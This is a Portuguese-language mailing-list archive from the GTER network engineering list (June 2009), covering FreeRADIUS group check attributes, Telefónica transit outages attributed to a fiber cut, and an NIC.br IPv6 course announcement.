Schoedler wrote: > Pessoal. > > Andei fazendo mais alguns testes... > > Aparentemente, os atributos de verifica??o por grupos s? serve para dizer > ao FR quando enviar ou n?o atributos de retorno do grupo ao NAS. > N?o consegui fazer qualquer verifica??o de atributos utilizando a tabela > radgroupcheck. > > Abaixo, segue um exemplo. > > 'test-user' pertence ao grupo 'test-group'. > > Na tabela de radgroupcheck, adicionei a seguinte "regra": > 'test-group' => Framed-Protocol == PPP > > Na tabela de radgroupreply, adicionei um atributo de retorno: > 'test-group' => Idle-Timeout <= 600 > > Ent?o come?ou a funcionar... mas n?o do jeito que eu imaginava ou > precisava. > Quando enviei 'Framed-Protocol' na requisi??o, ele respondia o atributo > especificado no grupo. > > Na verdade, eu precisaria que ele rejeitasse (Access-Reject) se a > requisi??o n?o tivesse 'Framed-Protocol' ou ent?o o valor desse atributo > fosse diferente de PPP. > > # radtest test-user test-pass localhost 0 testing123 1 > Sending Access-Request of id 110 to 127.0.0.1 port 1812 > User-Name = "test-user" > User-Password = "test-pass" > NAS-IP-Address = 127.0.0.1 > NAS-Port = 0 > Framed-Protocol = PPP > rad_recv: Access-Accept packet from host 127.0.0.1 port 1812, id=110, > length=26 > Idle-Timeout = 600 > > Quando mandava sem, ele respondia Access-Accept de qualquer jeito... mas > n?o retornava 'Idle-Timeout'. > > # radtest test-user test-pass localhost 0 testing123 > Sending Access-Request of id 12 to 127.0.0.1 port 1812 > User-Name = "test-user" > User-Password = "test-pass" > NAS-IP-Address = 127.0.0.1 > NAS-Port = 0 > rad_recv: Access-Accept packet from host 127.0.0.1 port 1812, id=12, > length=20 > > Ou seja: se eu quiser recusar qualquer login a partir dos atributos da > requisi??o, terei de adicionar atributos em usu?rio por usu?rio.... nada > pr?tico e muito suscet?vel a erros por parte do operador. > > Acredito que uma solu??o seria alterar a consulta SQL de > authorize_check_query ... talvez um UNION trazendo junto os atributos do > radgroupcheck. > N?o ? a melhor solu??o, mas acho que funcionaria. > > Abra?os. > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- gter list https://eng.registro.br/mailman/listinfo/gter From rodrigo.broilo at terra.com.br Tue Jun 2 17:58:06 2009 From: rodrigo.broilo at terra.com.br (Rodrigo Broilo) Date: Tue, 2 Jun 2009 17:58:06 -0300 Subject: [GTER] =?iso-8859-1?q?_Problemas_na_TIWS_=28Telef=F3nica=29?= In-Reply-To: References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> Message-ID: <008f01c9e3c4$d5fdb940$81f92bc0$@broilo@terra.com.br> Boa tarde, A Telef?nica Wholesale (TIWS) est? com problemas de rompimento de fibra em Honduras, por isso a capacidade de tr?fego diminuiu e todos est?o enfrentando problemas espor?dicos (alto tr?fego). Acho que a TIWS j? esteja usando meios alternativos para melhorar o servi?o (n?o tenho notado mais lentid?o na minha conex?o). Fonte: http://www.americaeconomia.com.br/278186-Telefonica-enfrenta-falhas-na-conex ao-da-web-no-Peru-.note.aspx Abs,. ------------------------------------------------------------- Rodrigo Christian Broilo rodrigo.broilo at terra.com.br ------------------------------------------------------------- Antes de imprimir pense no meio ambiente. Esta mensagem pode conter informa??es confidenciais. Se a recebeu por engano, por favor, devolva-a ao remetente, apague-a e n?o divulgue seu conte?do. This message may contain confidential information. If received in error, please return it to the sender, delete it and do not disclose its content. From welliton at infonet.com.br Wed Jun 3 00:52:15 2009 From: welliton at infonet.com.br (=?ISO-8859-1?Q?Welliton_S=E1?=) Date: Wed, 3 Jun 2009 00:52:15 -0300 Subject: [GTER] =?iso-8859-1?q?Freeradius=3A_atributos_de_checagem_do_grup?= =?iso-8859-1?q?o_n=E3o_funcionam?= In-Reply-To: References: <2F825D207D3246EBA6A9E984341CDE79@admgaz.com.br> <2BB87D070AB64003A5343AFCEDD26356@admgaz.com.br> <3B49658924B14819BC4957F400F6A01D@admgaz.com.br> <4A25EA0A.6000101@onda.psi.br> Message-ID: Atualmente utilizo a tabela radcheckgroup apenas para o n?mero m?ximo de conex?es simult?neas, checagem j? prevista pelo freeradius, e s? funcionou quando usei o operador :=. Tamb?m estou tentando restringir o acesso de determinados grupos pelos atributos NAS-IP-Address ou NAS-Identifier, sem sucesso at? agora. J? li v?rias vezes a documenta??o, mas n?o consegui implementar ainda. Estou fazendo alguns testes usando o modulo checkval na se??o de autoriza??o. Voc? pode dar uma olhada na documenta??o desse m?dulo, talvez ele atenda ?s suas necessidades. 2009/6/3 Eduardo Schoedler : > Eu estou controlando tudo por mysql... ao meu ver, n?o deveria ser > necess?rio criar uma estrutura adicional, uma vez que j? existem tabelas que > fazem/comportam exatamente o que eu precisaria informar ao FR. > > Bom, paci?ncia... > > Abra?o! From itamar at ispbrasil.com.br Tue Jun 2 23:09:01 2009 From: itamar at ispbrasil.com.br (Itamar Reis Peixoto) Date: Tue, 2 Jun 2009 23:09:01 -0300 Subject: [GTER] e-learning IPv6 do NIC.br In-Reply-To: <4A247806.20301@nic.br> References: <4A247806.20301@nic.br> Message-ID: tomara que o povo adote o ipv6 rapidamente. eu odeio NAT IP VALIDOS PARA TODO MUNDO J?! hahahahahahah depois d? uma olhada neste outro aqui. http://www.ccna.com.br/VA/VA_IPv6/player.html 2009/6/1 Antonio M. Moreiras : > Senhores, > > Dando continuidade ?s a??es do CGI.br e NIC.br em favor do uso > do IPv6 no Brasil, entrou hoje em funcionamento o site: > > http://curso.ipv6.br > > com nosso "Curso de Introdu??o ao IPv6" em formato e-learning. > > Esperamos que seja ?til! Por gentileza, divulguem. > > Atenciosamente, > > -- > Antonio M. Moreiras > moreiras at nic.br > http://www.ceptro.br > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- ------------ Itamar Reis Peixoto e-mail/msn: itamar at ispbrasil.com.br sip: itamar at ispbrasil.com.br skype: itamarjp icq: 81053601 +55 11 4063 5033 +55 34 3221 8599 From raphaelbscosta at gmail.com Wed Jun 3 07:36:38 2009 From: raphaelbscosta at gmail.com (Raphael Costa) Date: Wed, 3 Jun 2009 07:36:38 -0300 Subject: [GTER] =?iso-8859-1?q?Problemas_na_TIWS_=28Telef=F3nica=29?= In-Reply-To: <-1283472318543576950@unknownmsgid> References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <-1283472318543576950@unknownmsgid> Message-ID: A Telef?nica nos deu essa desculpa, s? n?o entendo porque o ping e traceroute n?o mostram isso. Tenho um cliente que possui um servidor no ThePlanet e outro aqui na empresa, esse servidor do Br tem 2 ips configurados, quando o cliente executa um scp do ThePlanet para o ip A desse servidor, a transfer?ncia come?a e logo depois d? timeout, para o ip B o scp funciona normalmente. Alteramos a sa?da para o ThePlanet por outro link, n?o resolveu, ent?o colocamos uma rota mais espec?fica pelo nosso link da Oi, assim tudo voltou a funcionar perfeitamente. []s, Raphael Costa 2009/6/2 Rodrigo Broilo > Boa tarde, > > A Telef?nica Wholesale (TIWS) est? com problemas de rompimento de fibra em > Honduras, por isso a capacidade de tr?fego diminuiu e todos est?o > enfrentando problemas espor?dicos (alto tr?fego). Acho que a TIWS j? esteja > usando meios alternativos para melhorar o servi?o (n?o tenho notado mais > lentid?o na minha conex?o). > > Fonte: > > http://www.americaeconomia.com.br/278186-Telefonica-enfrenta-falhas-na-conex > ao-da-web-no-Peru-.note.aspx > > Abs,. > > ------------------------------------------------------------- > Rodrigo Christian Broilo > rodrigo.broilo at terra.com.br > ------------------------------------------------------------- > Antes de imprimir pense no meio ambiente. > Esta mensagem pode conter informa??es confidenciais. Se a recebeu por > engano, por favor, devolva-a ao remetente, apague-a e n?o divulgue seu > conte?do. > This message may contain confidential information. If received in error, > please return it to the sender, delete it and do not disclose its content. > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Raphael Bittencourt S. Costa raphaelbscosta at yahoo.com.br raphaelbscosta at gmail.com From mafbotelho at gmail.com Wed Jun 3 07:18:42 2009 From: mafbotelho at gmail.com (=?UTF-8?Q?Botelho=2C_Marco_Ant=C3=B4nio_Faria?=) Date: Wed, 3 Jun 2009 07:18:42 -0300 Subject: [GTER] =?utf-8?q?Freeradius=3A_atributos_de_checagem_do_grupo_n?= =?utf-8?q?=C3=A3o_funcionam?= In-Reply-To: <3B49658924B14819BC4957F400F6A01D@admgaz.com.br> References: <2F825D207D3246EBA6A9E984341CDE79@admgaz.com.br> <2BB87D070AB64003A5343AFCEDD26356@admgaz.com.br> <3B49658924B14819BC4957F400F6A01D@admgaz.com.br> Message-ID: <6a9c66d40906030318o6d026813l792ca1826b28a785@mail.gmail.com> Eduardo, bom dia! Verifique dentro do arquivo sql.conf a op??o read_group: # If set to 'yes' (default) we read the group tables # If set to 'no' the user MUST have Fall-Through = Yes in the radreply table # read_groups = yes Botelho, Marco Ant?nio Faria 2009/6/3 Eduardo Schoedler > Pessoal. > > Andei fazendo mais alguns testes... > > Aparentemente, os atributos de verifica??o por grupos s? serve para dizer > ao FR quando enviar ou n?o atributos de retorno do grupo ao NAS. > N?o consegui fazer qualquer verifica??o de atributos utilizando a tabela > radgroupcheck. > > Abaixo, segue um exemplo. > > 'test-user' pertence ao grupo 'test-group'. > > Na tabela de radgroupcheck, adicionei a seguinte "regra": > 'test-group' => Framed-Protocol == PPP > > Na tabela de radgroupreply, adicionei um atributo de retorno: > 'test-group' => Idle-Timeout <= 600 > > Ent?o come?ou a funcionar... mas n?o do jeito que eu imaginava ou > precisava. > Quando enviei 'Framed-Protocol' na requisi??o, ele respondia o atributo > especificado no grupo. > > Na verdade, eu precisaria que ele rejeitasse (Access-Reject) se a > requisi??o n?o tivesse 'Framed-Protocol' ou ent?o o valor desse atributo > fosse diferente de PPP. > > # radtest test-user test-pass localhost 0 testing123 1 > Sending Access-Request of id 110 to 127.0.0.1 port 1812 > User-Name = "test-user" > User-Password = "test-pass" > NAS-IP-Address = 127.0.0.1 > NAS-Port = 0 > Framed-Protocol = PPP > rad_recv: Access-Accept packet from host 127.0.0.1 port 1812, id=110, > length=26 > Idle-Timeout = 600 > > Quando mandava sem, ele respondia Access-Accept de qualquer jeito... mas > n?o retornava 'Idle-Timeout'. > > # radtest test-user test-pass localhost 0 testing123 > Sending Access-Request of id 12 to 127.0.0.1 port 1812 > User-Name = "test-user" > User-Password = "test-pass" > NAS-IP-Address = 127.0.0.1 > NAS-Port = 0 > rad_recv: Access-Accept packet from host 127.0.0.1 port 1812, id=12, > length=20 > > Ou seja: se eu quiser recusar qualquer login a partir dos atributos da > requisi??o, terei de adicionar atributos em usu?rio por usu?rio.... nada > pr?tico e muito suscet?vel a erros por parte do operador. > > Acredito que uma solu??o seria alterar a consulta SQL de > authorize_check_query ... talvez um UNION trazendo junto os atributos do > radgroupcheck. > N?o ? a melhor solu??o, mas acho que funcionaria. > > Abra?os. From antoniocarlospina at gmail.com Wed Jun 3 09:58:07 2009 From: antoniocarlospina at gmail.com (Antonio Carlos Pina) Date: Wed, 3 Jun 2009 09:58:07 -0300 Subject: [GTER] =?iso-8859-1?q?Problemas_na_TIWS_=28Telef=F3nica=29?= In-Reply-To: References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <-1283472318543576950@unknownmsgid> Message-ID: <86b352050906030558m6804f4d3gd0038c96e14ec41d@mail.gmail.com> Concordo. A Not?cia que t?nhamos era que o rompimento de fibra ocorreu entre o Peru e a am?rica do norte. Nenhuma rela??o direta conosco a n?o ser que os links remanescentes ficassem sobrecarregados com o roteamento do tr?fego. Mas n?o explicaria o funcionamento de ping e traceroute, por exemplo e o congelamento do SCP. Abs 2009/6/3 Raphael Costa > A Telef?nica nos deu essa desculpa, s? n?o entendo porque o ping e > traceroute n?o mostram isso. > Tenho um cliente que possui um servidor no ThePlanet e outro aqui na > empresa, esse servidor do Br tem 2 ips configurados, quando o cliente > executa um scp do ThePlanet para o ip A desse servidor, a transfer?ncia > come?a e logo depois d? timeout, para o ip B o scp funciona normalmente. > Alteramos a sa?da para o ThePlanet por outro link, n?o resolveu, ent?o > colocamos uma rota mais espec?fica pelo nosso link da Oi, assim tudo voltou > a funcionar perfeitamente. > > []s, > > Raphael Costa > > 2009/6/2 Rodrigo Broilo > > > Boa tarde, > > > > A Telef?nica Wholesale (TIWS) est? com problemas de rompimento de fibra > em > > Honduras, por isso a capacidade de tr?fego diminuiu e todos est?o > > enfrentando problemas espor?dicos (alto tr?fego). Acho que a TIWS j? > esteja > > usando meios alternativos para melhorar o servi?o (n?o tenho notado mais > > lentid?o na minha conex?o). > > > > Fonte: > > > > > http://www.americaeconomia.com.br/278186-Telefonica-enfrenta-falhas-na-conex > > ao-da-web-no-Peru-.note.aspx< > http://www.americaeconomia.com.br/278186-Telefonica-enfrenta-falhas-na-conex%0Aao-da-web-no-Peru-.note.aspx > > > > > > Abs,. > > > > ------------------------------------------------------------- > > Rodrigo Christian Broilo > > rodrigo.broilo at terra.com.br > > ------------------------------------------------------------- > > Antes de imprimir pense no meio ambiente. > > Esta mensagem pode conter informa??es confidenciais. Se a recebeu por > > engano, por favor, devolva-a ao remetente, apague-a e n?o divulgue seu > > conte?do. > > This message may contain confidential information. If received in error, > > please return it to the sender, delete it and do not disclose its > content. > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > -- > Raphael Bittencourt S. Costa > raphaelbscosta at yahoo.com.br > raphaelbscosta at gmail.com > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From eschoedler at viavale.com.br Wed Jun 3 10:50:34 2009 From: eschoedler at viavale.com.br (Eduardo Schoedler) Date: Wed, 3 Jun 2009 10:50:34 -0300 Subject: [GTER] =?utf-8?q?Freeradius=3A_atributos_de_checagem_do_grupo_n?= =?utf-8?q?=C3=A3o_funcionam?= References: <2F825D207D3246EBA6A9E984341CDE79@admgaz.com.br><2BB87D070AB64003A5343AFCEDD26356@admgaz.com.br><3B49658924B14819BC4957F400F6A01D@admgaz.com.br> <6a9c66d40906030318o6d026813l792ca1826b28a785@mail.gmail.com> Message-ID: Ol? Marco! Eu j? havia descomentado essa linha... e ele realmente est? fazendo a consulta sql nas tabelas de grupo. Por?m, n?o trabalha da forma de que eu necessito. Vou mudar o sql de authorize_check_query para trazer junto os atributos de verifica??o do grupo, pois ? nesse instante que ele autentica (Access-Accept) o usu?rio. Abra?o. ----- Original Message ----- From: "Botelho, Marco Ant?nio Faria" To: "Grupo de Trabalho de Engenharia e Operacao de Redes" Sent: Wednesday, June 03, 2009 7:18 AM Subject: Re: [GTER]Freeradius: atributos de checagem do grupo n?o funcionam > Eduardo, bom dia! > > Verifique dentro do arquivo sql.conf a op??o read_group: > > # If set to 'yes' (default) we read the group tables > # If set to 'no' the user MUST have Fall-Through = Yes in the > radreply table > # read_groups = yes > > Botelho, Marco Ant?nio Faria > > 2009/6/3 Eduardo Schoedler > >> Pessoal. >> >> Andei fazendo mais alguns testes... >> >> Aparentemente, os atributos de verifica??o por grupos s? serve para dizer >> ao FR quando enviar ou n?o atributos de retorno do grupo ao NAS. >> N?o consegui fazer qualquer verifica??o de atributos utilizando a tabela >> radgroupcheck. >> >> Abaixo, segue um exemplo. >> >> 'test-user' pertence ao grupo 'test-group'. >> >> Na tabela de radgroupcheck, adicionei a seguinte "regra": >> 'test-group' => Framed-Protocol == PPP >> >> Na tabela de radgroupreply, adicionei um atributo de retorno: >> 'test-group' => Idle-Timeout <= 600 >> >> Ent?o come?ou a funcionar... mas n?o do jeito que eu imaginava ou >> precisava. >> Quando enviei 'Framed-Protocol' na requisi??o, ele respondia o atributo >> especificado no grupo. >> >> Na verdade, eu precisaria que ele rejeitasse (Access-Reject) se a >> requisi??o n?o tivesse 'Framed-Protocol' ou ent?o o valor desse atributo >> fosse diferente de PPP. >> >> # radtest test-user test-pass localhost 0 testing123 1 >> Sending Access-Request of id 110 to 127.0.0.1 port 1812 >> User-Name = "test-user" >> User-Password = "test-pass" >> NAS-IP-Address = 127.0.0.1 >> NAS-Port = 0 >> Framed-Protocol = PPP >> rad_recv: Access-Accept packet from host 127.0.0.1 port 1812, id=110, >> length=26 >> Idle-Timeout = 600 >> >> Quando mandava sem, ele respondia Access-Accept de qualquer jeito... mas >> n?o retornava 'Idle-Timeout'. >> >> # radtest test-user test-pass localhost 0 testing123 >> Sending Access-Request of id 12 to 127.0.0.1 port 1812 >> User-Name = "test-user" >> User-Password = "test-pass" >> NAS-IP-Address = 127.0.0.1 >> NAS-Port = 0 >> rad_recv: Access-Accept packet from host 127.0.0.1 port 1812, id=12, >> length=20 >> >> Ou seja: se eu quiser recusar qualquer login a partir dos atributos da >> requisi??o, terei de adicionar atributos em usu?rio por usu?rio.... nada >> pr?tico e muito suscet?vel a erros por parte do operador. >> >> Acredito que uma solu??o seria alterar a consulta SQL de >> authorize_check_query ... talvez um UNION trazendo junto os atributos do >> radgroupcheck. >> N?o ? a melhor solu??o, mas acho que funcionaria. >> >> Abra?os. From mike at braslink.com Wed Jun 3 11:39:47 2009 From: mike at braslink.com (Mike Tesliuk) Date: Wed, 3 Jun 2009 11:39:47 -0300 Subject: [GTER] Ainda problemas com a telefonica In-Reply-To: References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> Message-ID: <7a152a290906030739k31258d23u946589daf9888a3a@mail.gmail.com> Foi informado aqui na lista uma informa??o referente a um problema com rompimento de fibra, um de nossos usu?rios disse que a telefonica passou hoje a mesma informa??o para ele informando que a estrutura de backup est? sobrecarregada. 2009/6/2 Victor Benincasa : > Mike e colegas de lista, > > Tamb?m estamos com o mesmo problema. Temos servidores na ThePlanet > (Texas-EUA), e h? cerca de 5 dias alguns clientes nossos que utilizam links > da Telef?nica (em especial o Speedy) est?o relatando problemas no > recebimento de e-mails (timeout). > > Ping (pacotes ICMP) trafegam sem problema, j? pacotes TCP tem tido uma > taxa de perda m?dia de 50%! > > Algu?m tem alguma luz ou contato com pessoal t?cnico da Telefonica? > > -- > Victor Benincasa > http://netbit.com.br > > > ----- Original Message ----- From: "Mike Tesliuk" > To: "Grupo de Trabalho de Engenharia e Operacao de Redes" > > Sent: Tuesday, June 02, 2009 2:53 PM > Subject: [GTER] Ainda problemas com a telefonica > > > Ol? Amigos, > > Eu queria saber se algu?m est? tendo problemas com a telefonica ainda > (estamos a uma semana ja) ? > > Temos nossa rede em miami ( 204.16.0.0/22 ) e usu?rios / provedores > que utilizam a estrutura da telefonica n?o est?o chegando at? nossos > servidores (com qualidade), n?s mesmos temos uma lp da telefonica e > tive que trocar para uma conex?o da net para podermos trabalhar > enquanto este problema n?o se resolve, basicamente eu tenho ping ok > atrav?s da telefonica, a rota pelo que me parece eu passo por dentro > da estrutura de adsl da telefonica, abaixo coloco um exemplo da minha > rota. > > traceroute to 204.16.0.1 (204.16.0.1), 30 hops max, 40 byte packets > 1 ?gw-spo-lins-tel (189.109.27.1) ?0.881 ms ?0.834 ms ?0.766 ms > 2 ?189-109-5-185.customer.tdatabrasil.net.br (189.109.5.185) ?2.096 > ms ?2.021 ms ?2.016 ms > 3 ?* * * > 4 ?201-0-3-65.dsl.telesp.net.br (201.0.3.65) ?2.462 ms ?2.663 ms ?2.532 ms > 5 ?201-63-253-142.customer.tdatabrasil.net.br (201.63.253.142) ?2.810 > ms ?2.729 ms 201-63-253-146.customer.tdatabrasil.net.br > (201.63.253.146) ?2.754 ms > 6 ?Xe3-1-0-0-grtsanem2.red.telefonica-wholesale.net.10.16.84.in-add > (84.16.10.17) ?4.943 ms ?4.008 ms > Xe7-2-0-0-grtsanem2.red.telefonica-wholesale.net (84.16.10.233) ?4.138 > ms > 7 ?Xe8-1-0-0-grtmiabr6.red.telefonica-wholesale.net (84.16.15.22) > 117.589 ms ?117.636 ms ?117.604 ms > 8 ?Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.229) > 162.865 ms Xe0-0-0-0-grtwaseq4.red.telefonica-wholesale.net > (213.140.36.153) ?152.998 ms > Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.229) > 162.824 ms > 9 ?Pccwbtn-0-3-0-0-grtwaseq4.red.telefonica-wholesale.net > (213.140.53.22) ?315.858 ms ?199.672 ms ?252.659 ms > 10 ?braslink.fe3-4.br01.mia02.pccwbtn.net (63.218.113.62) ?183.716 ms * * > > > Meus clientes est?o tendo dificuldades para utilizar servi?os de email > e ftp, sites, eles tentam acessar fica carregando, quando tentam > novamente eles conseguem ( ou n?o ) > > Agrade?o informa??es. > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From humberto at hss.blog.br Wed Jun 3 13:57:25 2009 From: humberto at hss.blog.br (Humberto Sartini) Date: Wed, 3 Jun 2009 13:57:25 -0300 Subject: [GTER] Ainda problemas com a telefonica In-Reply-To: <7a152a290906030739k31258d23u946589daf9888a3a@mail.gmail.com> References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <7a152a290906030739k31258d23u946589daf9888a3a@mail.gmail.com> Message-ID: Pessoal, Isso ? reflexo do terremoto que teve em Honduras em 29/05/09. O cabo submarino rompeu e o trabalho para recuperar n?o deve ser f?cil. http://www.telecompaper.com/news/SendArticle.aspx?u=False -- [ ]'s Humberto Sartini Certificado LPIC-1 http://www.hss.blog.br PGP KEY ID 0xB32E5C8D 2009/6/3 Mike Tesliuk > Foi informado aqui na lista uma informa??o referente a um problema com > rompimento de fibra, um de nossos usu?rios disse que a telefonica > passou hoje a mesma informa??o para ele informando que a estrutura de > backup est? sobrecarregada. > > 2009/6/2 Victor Benincasa : > > Mike e colegas de lista, > > > > Tamb?m estamos com o mesmo problema. Temos servidores na ThePlanet > > (Texas-EUA), e h? cerca de 5 dias alguns clientes nossos que utilizam > links > > da Telef?nica (em especial o Speedy) est?o relatando problemas no > > recebimento de e-mails (timeout). > > > > Ping (pacotes ICMP) trafegam sem problema, j? pacotes TCP tem tido uma > > taxa de perda m?dia de 50%! > > > > Algu?m tem alguma luz ou contato com pessoal t?cnico da Telefonica? > > > > -- > > Victor Benincasa > > http://netbit.com.br > > > > > > ----- Original Message ----- From: "Mike Tesliuk" > > To: "Grupo de Trabalho de Engenharia e Operacao de Redes" > > > > Sent: Tuesday, June 02, 2009 2:53 PM > > Subject: [GTER] Ainda problemas com a telefonica > > > > > > Ol? Amigos, > > > > Eu queria saber se algu?m est? tendo problemas com a telefonica ainda > > (estamos a uma semana ja) ? > > > > Temos nossa rede em miami ( 204.16.0.0/22 ) e usu?rios / provedores > > que utilizam a estrutura da telefonica n?o est?o chegando at? nossos > > servidores (com qualidade), n?s mesmos temos uma lp da telefonica e > > tive que trocar para uma conex?o da net para podermos trabalhar > > enquanto este problema n?o se resolve, basicamente eu tenho ping ok > > atrav?s da telefonica, a rota pelo que me parece eu passo por dentro > > da estrutura de adsl da telefonica, abaixo coloco um exemplo da minha > > rota. > > > > traceroute to 204.16.0.1 (204.16.0.1), 30 hops max, 40 byte packets > > 1 gw-spo-lins-tel (189.109.27.1) 0.881 ms 0.834 ms 0.766 ms > > 2 189-109-5-185.customer.tdatabrasil.net.br (189.109.5.185) 2.096 > > ms 2.021 ms 2.016 ms > > 3 * * * > > 4 201-0-3-65.dsl.telesp.net.br (201.0.3.65) 2.462 ms 2.663 ms 2.532 > ms > > 5 201-63-253-142.customer.tdatabrasil.net.br (201.63.253.142) 2.810 > > ms 2.729 ms 201-63-253-146.customer.tdatabrasil.net.br > > (201.63.253.146) 2.754 ms > > 6 Xe3-1-0-0-grtsanem2.red.telefonica-wholesale.net.10.16.84.in-add > > (84.16.10.17) 4.943 ms 4.008 ms > > Xe7-2-0-0-grtsanem2.red.telefonica-wholesale.net (84.16.10.233) 4.138 > > ms > > 7 Xe8-1-0-0-grtmiabr6.red.telefonica-wholesale.net (84.16.15.22) > > 117.589 ms 117.636 ms 117.604 ms > > 8 Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.229) > > 162.865 ms Xe0-0-0-0-grtwaseq4.red.telefonica-wholesale.net > > (213.140.36.153) 152.998 ms > > Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.229) > > 162.824 ms > > 9 Pccwbtn-0-3-0-0-grtwaseq4.red.telefonica-wholesale.net > > (213.140.53.22) 315.858 ms 199.672 ms 252.659 ms > > 10 braslink.fe3-4.br01.mia02.pccwbtn.net (63.218.113.62) 183.716 ms * > * > > > > > > Meus clientes est?o tendo dificuldades para utilizar servi?os de email > > e ftp, sites, eles tentam acessar fica carregando, quando tentam > > novamente eles conseguem ( ou n?o ) > > > > Agrade?o informa??es. > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From antoniocarlospina at gmail.com Wed Jun 3 14:05:49 2009 From: antoniocarlospina at gmail.com (Antonio Carlos Pina) Date: Wed, 3 Jun 2009 14:05:49 -0300 Subject: [GTER] Ainda problemas com a telefonica In-Reply-To: References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <7a152a290906030739k31258d23u946589daf9888a3a@mail.gmail.com> Message-ID: <86b352050906031005p37d2b382kccc34b982fb3d8c4@mail.gmail.com> Humberto, A Telefonica contou essa historia para todo mundo que abriu chamado. As minhas d?vidas sobre o assunto na verdade s?o: a) Por que o cabo ?tico que liga o Peru ? Am?rica do Norte via Honduras afetou o Brasil ? b) Por que o tr?fego PING e TRACEROUTE n?o foi afetado junto com TCP ? Sinceramente n?o sei se essa quest?o do cabo explica o problema. Penso que a hist?ria ? maior que isso. Abs 2009/6/3 Humberto Sartini > Pessoal, > > Isso ? reflexo do terremoto que teve em Honduras em 29/05/09. O cabo > submarino rompeu e o trabalho para recuperar n?o deve ser f?cil. > > http://www.telecompaper.com/news/SendArticle.aspx?u=False > > -- > [ ]'s > Humberto Sartini > Certificado LPIC-1 > http://www.hss.blog.br > PGP KEY ID 0xB32E5C8D > > 2009/6/3 Mike Tesliuk > > > Foi informado aqui na lista uma informa??o referente a um problema com > > rompimento de fibra, um de nossos usu?rios disse que a telefonica > > passou hoje a mesma informa??o para ele informando que a estrutura de > > backup est? sobrecarregada. > > > > 2009/6/2 Victor Benincasa : > > > Mike e colegas de lista, > > > > > > Tamb?m estamos com o mesmo problema. Temos servidores na ThePlanet > > > (Texas-EUA), e h? cerca de 5 dias alguns clientes nossos que utilizam > > links > > > da Telef?nica (em especial o Speedy) est?o relatando problemas no > > > recebimento de e-mails (timeout). > > > > > > Ping (pacotes ICMP) trafegam sem problema, j? pacotes TCP tem tido uma > > > taxa de perda m?dia de 50%! > > > > > > Algu?m tem alguma luz ou contato com pessoal t?cnico da Telefonica? > > > > > > -- > > > Victor Benincasa > > > http://netbit.com.br > > > > > > > > > ----- Original Message ----- From: "Mike Tesliuk" > > > To: "Grupo de Trabalho de Engenharia e Operacao de Redes" > > > > > > Sent: Tuesday, June 02, 2009 2:53 PM > > > Subject: [GTER] Ainda problemas com a telefonica > > > > > > > > > Ol? Amigos, > > > > > > Eu queria saber se algu?m est? tendo problemas com a telefonica ainda > > > (estamos a uma semana ja) ? > > > > > > Temos nossa rede em miami ( 204.16.0.0/22 ) e usu?rios / provedores > > > que utilizam a estrutura da telefonica n?o est?o chegando at? nossos > > > servidores (com qualidade), n?s mesmos temos uma lp da telefonica e > > > tive que trocar para uma conex?o da net para podermos trabalhar > > > enquanto este problema n?o se resolve, basicamente eu tenho ping ok > > > atrav?s da telefonica, a rota pelo que me parece eu passo por dentro > > > da estrutura de adsl da telefonica, abaixo coloco um exemplo da minha > > > rota. > > > > > > traceroute to 204.16.0.1 (204.16.0.1), 30 hops max, 40 byte packets > > > 1 gw-spo-lins-tel (189.109.27.1) 0.881 ms 0.834 ms 0.766 ms > > > 2 189-109-5-185.customer.tdatabrasil.net.br (189.109.5.185) 2.096 > > > ms 2.021 ms 2.016 ms > > > 3 * * * > > > 4 201-0-3-65.dsl.telesp.net.br (201.0.3.65) 2.462 ms 2.663 ms > 2.532 > > ms > > > 5 201-63-253-142.customer.tdatabrasil.net.br (201.63.253.142) 2.810 > > > ms 2.729 ms 201-63-253-146.customer.tdatabrasil.net.br > > > (201.63.253.146) 2.754 ms > > > 6 Xe3-1-0-0-grtsanem2.red.telefonica-wholesale.net.10.16.84.in-add > > > (84.16.10.17) 4.943 ms 4.008 ms > > > Xe7-2-0-0-grtsanem2.red.telefonica-wholesale.net (84.16.10.233) 4.138 > > > ms > > > 7 Xe8-1-0-0-grtmiabr6.red.telefonica-wholesale.net (84.16.15.22) > > > 117.589 ms 117.636 ms 117.604 ms > > > 8 Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.229) > > > 162.865 ms Xe0-0-0-0-grtwaseq4.red.telefonica-wholesale.net > > > (213.140.36.153) 152.998 ms > > > Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.229) > > > 162.824 ms > > > 9 Pccwbtn-0-3-0-0-grtwaseq4.red.telefonica-wholesale.net > > > (213.140.53.22) 315.858 ms 199.672 ms 252.659 ms > > > 10 braslink.fe3-4.br01.mia02.pccwbtn.net (63.218.113.62) 183.716 ms > * > > * > > > > > > > > > Meus clientes est?o tendo dificuldades para utilizar servi?os de email > > > e ftp, sites, eles tentam acessar fica carregando, quando tentam > > > novamente eles conseguem ( ou n?o ) > > > > > > Agrade?o informa??es. > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From humberto at hss.blog.br Wed Jun 3 14:11:40 2009 From: humberto at hss.blog.br (Humberto Sartini) Date: Wed, 3 Jun 2009 14:11:40 -0300 Subject: [GTER] 